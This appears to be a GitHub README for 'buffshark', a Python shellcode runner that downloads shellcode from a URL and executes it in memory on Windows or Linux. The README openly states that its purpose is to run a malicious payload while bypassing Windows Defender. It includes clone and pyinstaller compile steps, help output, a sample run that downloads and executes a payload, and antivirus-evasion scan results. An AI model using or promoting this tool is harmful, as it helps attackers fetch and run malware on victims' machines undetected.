
Python Shellcode Runner to execute malicious payload and bypass AV

This script utilizes mmap(for linux) and win api wrappers (for windows) to execute shellcode in memory and bypass Windows Defender.

Installation and Compiling

  1. Download the repo: git clone https://github.com/momo1239/buffshark-shellcode-runner
  2. Move directory: cd buffshark-shellcode-runner/

└─# python3 buffshark.py -h                                       
Buff Shark Shellcode Runner
 Author: Momo Nguyen 
usage: buffshark.py [-h] -u  -a

Python Shellcode Runner

optional arguments:
  -h, --help            show this help message and exit
  -u , --url            URL to raw shellcode file
  -a , --architecture   Choose OS
  1. Optional: Install pyinstaller to compile to windows executable: pip install pyinstaller
  2. Optional: Compile: pyinstaller -F buffshark.py


Example: python3 buffshark.py -u -a [win/nix]

Buff Shark Shellcode Runner
 Author: Momo Nguyen 
[+] Downloading shellcode...
[+] 49 Bytes Downloaded!
[+] Running shellcode in memory...
README.md  antiscan.PNG  antiscanres.PNG  buffshark.exe  buffshark.py  shell.bin  shellcode

AV Scan

As of 11/22/2021, Windows Defender does not flag this shellcode runner.

1/26 AV has flagged buffshark on antiscan.me




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